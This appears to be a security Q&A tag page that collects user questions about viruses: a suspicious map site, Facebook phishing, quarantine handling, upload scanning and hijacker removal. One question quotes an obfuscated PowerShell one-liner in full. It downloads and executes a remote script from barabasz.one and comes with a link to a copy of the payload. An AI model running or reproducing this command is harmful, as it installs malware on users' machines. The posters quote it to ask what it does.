Tag: virus

What kind of virus this website have? [closed]

I found website https://coronavirus-map.com and send it to a friend, then he said this website have a virus because his antivirus detect this website like virus. I didn’t know that websites can have viruses, I was thinking I can get virus only if download something and run. So I didn’t use a Antivirus and use just Ublock in my browser. I have Windows 10 OS. What kind of virus this website have and what it does ? Is my PC infected now and how I can clear/clean my PC from this virus? Sites like virus total find 1 detect/72

I maybe have facebook virus. PLEASE HELP! [closed]

so i got messege on facebook messenger from a friend that was actually sent by virus.the messege said something like “is this you haha ” and had link…only it was on my language. the link lead me to fake facebook page where i log in. i actually forget my password so i click on that fake site forget my password where i change it by loging in my google account. i loged in on my android phone and linux(ubuntu) pc. in panic i make a backup of my photos and videos on google photos and made factory reset on my phone and factory reset on pc. so i am worried. 1. did I remove a virus 2. did i had a virus or was i just giving my password 3. could they hack into my google account because of that 4. could my virus spread by my wifi to router and then on other devices 5. could virus be on my google photos. 6. do i need to do something

by the way i now changed all my google accounts passwords and on facebook i changed password

Quarantine virus found – how to remove the file securely?

There is a file found by antivirus program and it was put into the virus’ quarantine section (its not a false positive).

Now I don’t know how to handle this “quarantined” files.

1) What is the best practice and secure way to deal with them? Delete from quarantine, or let them in there?

2) If i delete a file from the quarantine, does it mean that it goes to the “recycle bin” of the computer and is thus still existent on my PC, and could be recovered by some tools like Recuva? Or will it be gone for ever

3) What happens if there are files in the quarantine and you accidentally de-install the antivirus program from your PC, what happens to the files?

Thanks.

Barabasz.one backdoor virus?

I’ve found weird virus online, it was the first time I have ever seen that form. It was presented as ‘shortcut’:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ lt=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';Set-Alias s $ lt;$ qax=((New-Object Net.WebClient)).DownloadString('https://barabasz.one/1.ps1');s $ qax

Screenshot:

enter image description here

In case that barabasz.one link would be deleted, here is the gist with the copy:

https://gist.githubusercontent.com/Ch3shireDev/d475ee80ec626fa482053f94853e77d8/raw/6526b8ac49d548232f3fba3d35050229e8566c41/barabasz-one.ps

What the heck does it do?

Can a virus that’s in a file stream infect a computer?

I have a java web application that accepts base64 image strings from users. These strings are first converted to a byte stream after which the stream is scanned for viruses. After that the file is stored as a resized version of the actual image.

My question is, when the file has been transformed from a base64 string to an in-memory byte stream and it happens to contain a virus, will that virus be able to escape the byte stream and infect the rest of the server? Or can it only do that after the stream has been transformed to a file stored on disk?

Should Anti Virus and Anti Malware layer be the first layer in web application stack or can it seat behind services?

Can you have Anti Virus and Anti Malware layer sitting deep with the microservice layer and have the malicious file flow through all the services ? Argument being the file is in memory and not getting processed until the service we will put the Anti Virus and Anti Malware layer on.

Shouldn’t this be stopped at the routing layer of the application?

ProPDFConverter virus removal help

So, I foolishley managed to get my computer infected with a browser hijacker called ProPDFConverter, which

devious web site or extension that has big resemblance to legitimate search engine based on appearance. It quietly enters into the computer and swiftly alters your default home page and new tab. All of a sudden, your main search application will be replaced with ProPDFConverter.

Indeed, whenever I opened a new tab it lead me to this obviously malicious search engine. When I first relized what happened, I immidiatly just removed the extention – which had the same name as the virus – from my Google Chrome, and on the surface, it helped: from this moment on, my browser got back to normal. But just to be sure, I searched for some information about this virus, and ran into some removal guides for it. All of them, without exeption, suggested to do the extention-removal bit LAST, after running malware scans and uninstall the program through the control panel.

And this is where the problem hit: I ran TWO different virus/malware scans, one with MalwareBytes and one with Norton Power Eraser, and both resulted in “no threats found”. When accessing the “uninstall a program” option in the control panel, I also could not locate a program with a simillar name to that of virus/extention. Infact, I could not locate any new programs from the date of the infection (October 9th). Both these facts seem very very odd.

So by all accounts, it seems that I solved the problem by just removing the exention from chrome, but I don’t know, it seems WAY TOO EASY to be true. I’m afraid that there are still some dangerous remenants of the virus of my PC, and neither I or any security program manages to locate them.

Am I just overlly paranoid, or is are there still remenants of the virus on my computer after all? If yes, How can I find out and remove them? And does this virus even does anything else other than that browser hajacking which I seemingly fixed?